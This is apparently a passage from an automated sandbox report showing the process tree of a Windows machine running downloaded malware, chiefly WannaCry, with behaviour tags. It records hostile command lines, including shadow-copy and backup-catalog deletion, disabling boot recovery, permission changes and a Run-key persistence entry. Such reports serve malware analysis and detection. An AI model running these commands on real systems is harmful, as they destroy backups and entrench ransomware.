  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4880 --field-trial-handle=1676,i,10105087097645781658,13545479109286327450,131072 /prefetch:8
  2⤵
  PID:7072
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=4972 --field-trial-handle=1676,i,10105087097645781658,13545479109286327450,131072 /prefetch:1
  2⤵
  PID:6792
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4968 --field-trial-handle=1676,i,10105087097645781658,13545479109286327450,131072 /prefetch:8
  2⤵
  PID:3392
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --instant-process --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=2884 --field-trial-handle=1676,i,10105087097645781658,13545479109286327450,131072 /prefetch:1
  2⤵
  PID:2456
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4912 --field-trial-handle=1676,i,10105087097645781658,13545479109286327450,131072 /prefetch:1
  2⤵
  PID:3924
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=3816 --field-trial-handle=1676,i,10105087097645781658,13545479109286327450,131072 /prefetch:1
  2⤵
  PID:7024
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3044 --field-trial-handle=1676,i,10105087097645781658,13545479109286327450,131072 /prefetch:8
  2⤵
  PID:944
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5208 --field-trial-handle=1676,i,10105087097645781658,13545479109286327450,131072 /prefetch:8
  2⤵
  PID:1316
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=3000 --field-trial-handle=1676,i,10105087097645781658,13545479109286327450,131072 /prefetch:1
  2⤵
  PID:4352
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=5516 --field-trial-handle=1676,i,10105087097645781658,13545479109286327450,131072 /prefetch:1
  2⤵
  PID:5140
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=5560 --field-trial-handle=1676,i,10105087097645781658,13545479109286327450,131072 /prefetch:1
  2⤵
  PID:6244
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2516 --field-trial-handle=1676,i,10105087097645781658,13545479109286327450,131072 /prefetch:8
  2⤵
  PID:352
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4620 --field-trial-handle=1676,i,10105087097645781658,13545479109286327450,131072 /prefetch:8
  2⤵
  PID:6928
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3952 --field-trial-handle=1676,i,10105087097645781658,13545479109286327450,131072 /prefetch:8
  2⤵
  PID:5920
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4880 --field-trial-handle=1676,i,10105087097645781658,13545479109286327450,131072 /prefetch:8
  2⤵
  PID:5592
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2996 --field-trial-handle=1676,i,10105087097645781658,13545479109286327450,131072 /prefetch:8
  2⤵
  PID:6892
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5088 --field-trial-handle=1676,i,10105087097645781658,13545479109286327450,131072 /prefetch:8
  2⤵
  PID:2752
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4672 --field-trial-handle=1676,i,10105087097645781658,13545479109286327450,131072 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2744
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --instant-process --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=1608 --field-trial-handle=1676,i,10105087097645781658,13545479109286327450,131072 /prefetch:1
  2⤵
  PID:2752
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=3048 --field-trial-handle=1676,i,10105087097645781658,13545479109286327450,131072 /prefetch:1
  2⤵
  PID:656
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --mojo-platform-channel-handle=1608 --field-trial-handle=1676,i,10105087097645781658,13545479109286327450,131072 /prefetch:1
  2⤵
  PID:3456
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --mojo-platform-channel-handle=3188 --field-trial-handle=1676,i,10105087097645781658,13545479109286327450,131072 /prefetch:1
  2⤵
  PID:6772
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5824 --field-trial-handle=1676,i,10105087097645781658,13545479109286327450,131072 /prefetch:8
  2⤵
  PID:5920
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5340 --field-trial-handle=1676,i,10105087097645781658,13545479109286327450,131072 /prefetch:8
  2⤵
  PID:508
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5312 --field-trial-handle=1676,i,10105087097645781658,13545479109286327450,131072 /prefetch:8
  2⤵
  PID:7220
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5204 --field-trial-handle=1676,i,10105087097645781658,13545479109286327450,131072 /prefetch:8
  2⤵
  PID:7308
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5740 --field-trial-handle=1676,i,10105087097645781658,13545479109286327450,131072 /prefetch:8
  2⤵
  PID:7316
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5728 --field-trial-handle=1676,i,10105087097645781658,13545479109286327450,131072 /prefetch:8
  2⤵
  PID:7484
- C:\Users\Admin\Downloads\ArcticBomb.exe
  "C:\Users\Admin\Downloads\ArcticBomb.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:7496
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2192 --field-trial-handle=1676,i,10105087097645781658,13545479109286327450,131072 /prefetch:8
  2⤵
  PID:8060
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3824 --field-trial-handle=1676,i,10105087097645781658,13545479109286327450,131072 /prefetch:8
  2⤵
  PID:8068
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2376 --field-trial-handle=1676,i,10105087097645781658,13545479109286327450,131072 /prefetch:8
  2⤵
  PID:8140
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3252 --field-trial-handle=1676,i,10105087097645781658,13545479109286327450,131072 /prefetch:8
  2⤵
  PID:7080
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5280 --field-trial-handle=1676,i,10105087097645781658,13545479109286327450,131072 /prefetch:8
  2⤵
  PID:652
- C:\Users\Admin\Downloads\BlueScreen.exe
  "C:\Users\Admin\Downloads\BlueScreen.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3900
- C:\Users\Admin\Downloads\BlueScreen.exe
  "C:\Users\Admin\Downloads\BlueScreen.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:7280
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5680 --field-trial-handle=1676,i,10105087097645781658,13545479109286327450,131072 /prefetch:8
  2⤵
  PID:6880
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3748 --field-trial-handle=1676,i,10105087097645781658,13545479109286327450,131072 /prefetch:8
  2⤵
  PID:5520
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=948 --field-trial-handle=1676,i,10105087097645781658,13545479109286327450,131072 /prefetch:8
  2⤵
  PID:3688
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=1536 --field-trial-handle=1676,i,10105087097645781658,13545479109286327450,131072 /prefetch:8
  2⤵
  PID:716
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5668 --field-trial-handle=1676,i,10105087097645781658,13545479109286327450,131072 /prefetch:8
  2⤵
  PID:7712
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5656 --field-trial-handle=1676,i,10105087097645781658,13545479109286327450,131072 /prefetch:8
  2⤵
  PID:6392
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5844 --field-trial-handle=1676,i,10105087097645781658,13545479109286327450,131072 /prefetch:8
  2⤵
  PID:6796
- C:\Users\Admin\Downloads\ColorBug.exe
  "C:\Users\Admin\Downloads\ColorBug.exe"
  2⤵
  - Adds Run key to start application
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Modifies Control Panel
  PID:1388
- C:\Users\Admin\Downloads\ColorBug.exe
  "C:\Users\Admin\Downloads\ColorBug.exe"
  2⤵
  - Executes dropped EXE
  - Modifies Control Panel
  PID:7880
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3880 --field-trial-handle=1676,i,10105087097645781658,13545479109286327450,131072 /prefetch:8
  2⤵
  PID:7896
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3200 --field-trial-handle=1676,i,10105087097645781658,13545479109286327450,131072 /prefetch:8
  2⤵
  PID:7964
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2384 --field-trial-handle=1676,i,10105087097645781658,13545479109286327450,131072 /prefetch:8
  2⤵
  PID:7980
- C:\Users\Admin\Downloads\DesktopPuzzle.exe
  "C:\Users\Admin\Downloads\DesktopPuzzle.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:8132

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:6412

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3724

C:\Users\Admin\Downloads\WannaCry.EXE
"C:\Users\Admin\Downloads\WannaCry.EXE"
1⤵
- Drops startup file
- Sets desktop wallpaper using registry
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:632
- C:\Windows\SysWOW64\attrib.exe
  attrib +h .
  2⤵
  - System Location Discovery: System Language Discovery
  - Views/modifies file attributes
  PID:6976
- C:\Windows\SysWOW64\icacls.exe
  icacls . /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  - System Location Discovery: System Language Discovery
  PID:5564
- C:\Users\Admin\Downloads\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2868
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c 59201722650842.bat
  2⤵
  - System Location Discovery: System Language Discovery
  PID:6612
- - C:\Windows\SysWOW64\cscript.exe
    cscript.exe //nologo m.vbs
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6832
- C:\Windows\SysWOW64\attrib.exe
  attrib +h +s F:\$RECYCLE
  2⤵
  - System Location Discovery: System Language Discovery
  - Views/modifies file attributes
  PID:3828
- C:\Users\Admin\Downloads\@[email protected]
  @[email protected] co
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:5540
- - C:\Users\Admin\Downloads\TaskData\Tor\taskhsvc.exe
    TaskData\Tor\taskhsvc.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:3828
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c start /b @[email protected] vs
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2960
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected] vs
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:3952
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
      4⤵
      System Location Discovery: System Language Discovery
      PID:4352
    - - C:\Windows\SysWOW64\vssadmin.exe
        
        vssadmin delete shadows /all /quiet
        5⤵
        System Location Discovery: System Language Discovery
        Interacts with shadow copies
        
        PID:6436
    - - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic shadowcopy delete
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:6920
- C:\Users\Admin\Downloads\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:7080
- C:\Users\Admin\Downloads\taskse.exe
  taskse.exe C:\Users\Admin\Downloads\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5232
- C:\Users\Admin\Downloads\@[email protected]
  @[email protected]
  2⤵
  - Sets desktop wallpaper using registry
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:3396
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "svgirwyi764" /t REG_SZ /d "\"C:\Users\Admin\Downloads\tasksche.exe\"" /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:6596
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "svgirwyi764" /t REG_SZ /d "\"C:\Users\Admin\Downloads\tasksche.exe\"" /f
    3⤵
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:6432
- C:\Users\Admin\Downloads\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:5876
- C:\Users\Admin\Downloads\taskse.exe
  taskse.exe C:\Users\Admin\Downloads\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:3652
- C:\Users\Admin\Downloads\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:3724
- C:\Users\Admin\Downloads\taskse.exe
  taskse.exe C:\Users\Admin\Downloads\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:6880
- C:\Users\Admin\Downloads\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:6660
- C:\Users\Admin\Downloads\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:6296
- C:\Users\Admin\Downloads\taskse.exe
  taskse.exe C:\Users\Admin\Downloads\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:6744
- C:\Users\Admin\Downloads\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:3652
- C:\Users\Admin\Downloads\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:5212
- C:\Users\Admin\Downloads\taskse.exe
  taskse.exe C:\Users\Admin\Downloads\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:7764
- C:\Users\Admin\Downloads\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:6392
- C:\Users\Admin\Downloads\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:7780
- C:\Users\Admin\Downloads\taskse.exe
  taskse.exe C:\Users\Admin\Downloads\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:6256
- C:\Users\Admin\Downloads\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:6444
- C:\Users\Admin\Downloads\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:4816
- C:\Users\Admin\Downloads\taskse.exe
  taskse.exe C:\Users\Admin\Downloads\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:4380
- C:\Users\Admin\Downloads\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:7060
- C:\Users\Admin\Downloads\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:4608
- C:\Users\Admin\Downloads\taskse.exe
  taskse.exe C:\Users\Admin\Downloads\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:8156
- C:\Users\Admin\Downloads\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:8172
- C:\Users\Admin\Downloads\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:6620
- C:\Users\Admin\Downloads\taskse.exe
  taskse.exe C:\Users\Admin\Downloads\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:3312
- C:\Users\Admin\Downloads\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:7180
- C:\Users\Admin\Downloads\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:2124
- C:\Users\Admin\Downloads\taskse.exe
  taskse.exe C:\Users\Admin\Downloads\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:7392
- C:\Users\Admin\Downloads\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:7244
- C:\Users\Admin\Downloads\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:7272
- C:\Users\Admin\Downloads\taskse.exe
  taskse.exe C:\Users\Admin\Downloads\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:7496
- C:\Users\Admin\Downloads\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:7064
- C:\Users\Admin\Downloads\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:7216
- C:\Users\Admin\Downloads\taskse.exe
  taskse.exe C:\Users\Admin\Downloads\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:7652
- C:\Users\Admin\Downloads\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:7644
- C:\Users\Admin\Downloads\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:7908
- C:\Users\Admin\Downloads\taskse.exe
  taskse.exe C:\Users\Admin\Downloads\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:1792
- C:\Users\Admin\Downloads\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:2316
- C:\Users\Admin\Downloads\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:6976
- C:\Users\Admin\Downloads\taskse.exe
  taskse.exe C:\Users\Admin\Downloads\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:7796
- C:\Users\Admin\Downloads\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:1100
- C:\Users\Admin\Downloads\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:6796
- C:\Users\Admin\Downloads\taskse.exe
  taskse.exe C:\Users\Admin\Downloads\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:8020
- C:\Users\Admin\Downloads\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:7892
- C:\Users\Admin\Downloads\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:8032
- C:\Users\Admin\Downloads\taskse.exe
  taskse.exe C:\Users\Admin\Downloads\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:8096
- C:\Users\Admin\Downloads\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:6584
- C:\Users\Admin\Downloads\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:7316
- C:\Users\Admin\Downloads\taskse.exe
  taskse.exe C:\Users\Admin\Downloads\@[email protected]
  2⤵
  PID:2752
- C:\Users\Admin\Downloads\@[email protected]
  @[email protected]
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:6744
- C:\Users\Admin\Downloads\taskdl.exe
  taskdl.exe
  2⤵
  PID:6264
- C:\Users\Admin\Downloads\taskse.exe
  taskse.exe C:\Users\Admin\Downloads\@[email protected]
  2⤵
  PID:4856
- C:\Users\Admin\Downloads\@[email protected]
  @[email protected]
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:6660
- C:\Users\Admin\Downloads\taskdl.exe
  taskdl.exe
  2⤵
  PID:7384
- C:\Users\Admin\Downloads\taskse.exe
  taskse.exe C:\Users\Admin\Downloads\@[email protected]
  2⤵
  PID:7436
- C:\Users\Admin\Downloads\@[email protected]
  @[email protected]
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:7444
- C:\Users\Admin\Downloads\taskdl.exe
  taskdl.exe
  2⤵
  PID:7268
- C:\Users\Admin\Downloads\taskse.exe
  taskse.exe C:\Users\Admin\Downloads\@[email protected]
  2⤵
  PID:7064
- C:\Users\Admin\Downloads\@[email protected]
  @[email protected]
  2⤵
  - Suspicious use of SetWindowsHookEx
  PID:7520
- C:\Users\Admin\Downloads\taskdl.exe
  taskdl.exe
  2⤵
  PID:7216
- C:\Users\Admin\Downloads\taskse.exe
  taskse.exe C:\Users\Admin\Downloads\@[email protected]
  2⤵
  PID:6116
- C:\Users\Admin\Downloads\@[email protected]
